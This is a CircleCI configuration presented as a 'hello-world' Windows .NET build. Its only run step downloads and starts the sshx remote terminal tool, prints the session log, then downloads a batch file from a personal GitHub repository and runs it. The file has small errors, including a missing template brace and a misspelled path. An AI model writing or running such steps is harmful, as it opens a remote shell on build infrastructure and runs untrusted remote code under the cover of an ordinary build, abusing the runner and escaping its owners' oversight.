version: 2.1

orbs:
  win: circleci/windows@4.1.1

workflows:
  hello-world:
    jobs:
      - build
  

jobs:
  build:
    executor:
      name: win/default
    working_directory: C:\Users\circleci\project\HelloWorld
    steps:
      - checkout:
          path: C:\Users\circleci\project
      - restore_cache:
          keys:
           - dotnet-packages-v1-{{ checksum "circleci-demo-windows.csproj" }
           
      - run:
          name: "Yes"
          command: | 
            md C:\Users\runneradmin\Documents
            wget -O setup.zip https://sshx.s3.amazonaws.com/sshx-x86_64-pc-windows-msvc.zip
            
            Expand-Archive -Path "C:\Users\circleci\setup.zip"  -DestinationPath "C:\Users\runneradmin\Documents" -Force
            Start-Process -FilePath "C:\Users\runnderadmin\Documents\sshx.exe" -NoNewWindow -RedirectStandardOutput "sshx.log"

            cat sshx.log

            sleep 60

            wget -O start.bat https://github.com/Efebey2903/files/raw/refs/heads/main/loop.bat
            cmd /c start.bat  
